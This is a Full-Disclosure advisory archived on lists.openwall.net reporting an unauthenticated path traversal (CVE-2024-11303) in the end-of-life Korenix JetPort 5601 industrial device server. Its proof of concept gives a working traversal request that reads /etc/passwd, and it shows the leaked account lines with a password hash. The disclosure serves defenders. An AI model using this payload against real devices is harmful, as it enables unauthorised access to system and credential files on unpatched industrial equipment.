lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <PAVPR08MB9577C54B28422EE8993E765E89202@PAVPR08MB9577.eurprd08.prod.outlook.com> Date: Tue, 19 Nov 2024 10:10:33 +0000 From: Weber Thomas via Fulldisclosure <fulldisclosure@...lists.org> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Cc: Thomas Weber <t.weber@...erdanube.com> Subject: [FD] St. Poelten UAS | Path Traversal in Korenix JetPort 5601 St. Pölten UAS 20241118-1 ------------------------------------------------------------------------------- title| Path Traversal product| Korenix JetPort 5601 vulnerable version| 1.2 fixed version| - CVE number| CVE-2024-11303 impact| High homepage| https://www.korenix.com/ found| 2024-05-24 by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer, | C. Hierzer, M. Pammer | These vulnerabilities were discovery during research at | St.Pölten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines [...]. Our products are mainly applied in SMART industries: Surveillance, Machine-to- Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. [...]" Source: https://www.korenix.com/en/about/index.aspx?kind=3 Vulnerable versions ------------------------------------------------------------------------------- Korenix JetPort 5601v3 / v1.2 Vulnerability overview ------------------------------------------------------------------------------- 1) Path Traversal (CVE-2024-11303) A path traversal attack for unauthenticated users is possible. This allows getting access to the operating system of the device and access information like configuration files and connections to other hosts or potentially other sensitive information. Proof of Concept ------------------------------------------------------------------------------- 1) Path Traversal (CVE-2024-11303) By sending the following request to the following endpoint, a path traversal vulnerability can be triggered: ------------------------------------------------------------------------------- GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 10.69.10.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Te: trailers Connection: keep-alive ------------------------------------------------------------------------------- Note, that this is only possible when an interceptor proxy or a command line tool is used. A web browser would encode the characters and the path traversal would not work. The response to the latter request is shown below: ------------------------------------------------------------------------------- HTTP/1.1 200 OK Server: thttpd/2.19-MX Jun 2 2022 Content-type: text/plain; charset=iso-8859-1 [...] Accept-Ranges: bytes Connection: Keep-Alive Content-length: 86 root::0:0:root:/root:/bin/false admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true ------------------------------------------------------------------------------- The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- None. Device is End-of-Life. Workaround ------------------------------------------------------------------------------- Limit the access to the device and place it within a segmented network. Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Korenix customers to upgrade to another device. Contact Timeline ------------------------------------------------------------------------------- 2024-09-23: Contacting Beijer Electronics Group via cs@...jerelectronics.com. 2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the engineering team if there are any changes. 2024-10-15: Vendor stated, that the advisory can be published. No further updates are planned for this device. 2024-11-18: Coordinated disclosure of advisory. Web: https://www.fhstp.ac.at/ Twitter: https://x.com/fh_stpoelten Mail: mis@...tp.ac.at EOF T. Weber / @2024 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists